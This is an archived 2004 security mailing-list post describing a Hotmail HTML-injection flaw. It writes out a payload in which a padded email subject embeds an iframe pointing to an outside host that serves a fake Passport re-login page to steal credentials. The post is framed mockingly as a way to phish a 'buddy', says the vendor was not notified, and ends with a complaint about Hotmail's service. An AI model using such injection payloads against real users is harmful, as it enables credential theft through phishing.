lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <200403181943.i2IJh1VN017772@web188.megawebservers.com> From: 1 at malware.com (http-equiv@...ite.com) Subject: HOTMAIL / PASSPORT: phishing expedition Thursday, March 18, 2004 Unbelievably ridiculous insertion of arbitrary html into the Hotmail web based email account of your targeted "buddy". In order to gain your "little pal's" credentials, simply send him or her an email with an extra long subject like so: heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddyheylittlebuddyheylittlebuddy heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle buddy<iframe src="http://www.malware.com/pithy.html"> Where our iframe points to window.open along with our trojanised passport re-sign in page. When your "chum" replies to your email, our iframe is rendered out of sight in the message body of the email and up goes our error window requesting him to login again. Only this time he'll be sending you his credentials. Notes: 1. this is too pathetic for words. Cursory checking of all settings in hotmail 'reply to' suggests there is no de- activation of html email when composing a reply. 2. consideration was given to informing the owner of this particular web based mail service of this particular issue however we have not used such a poor service in recent years. So much so one can only suspect that such a slovenly operation is intentional in order to force account users to upgrade to the pay service: a) as of three hours from time of writing we are still awaiting receipt of emails into the hotmail account from eight [that's numeral 8] different mail servers. Internal mail messages are instant, but three hours for external is completely unacceptable. b) constant 'server is busy' errors. What does 40 billion dollars buy you today. More acreage around your acreage for more privacy. b) initiation and re-activation of a dormant account of the free webmail account from the owner of this particular web based mail service requires a magnifying glass to see. if you don't have one, you're liable to select the pay for service as it appears there are no other choices. c) use yahoo mail. Instant receipt of emails from any mail server all the time. Reply to html email subject filters tags. End Call -- http://www.malware.com
Powered by blists - more mailing lists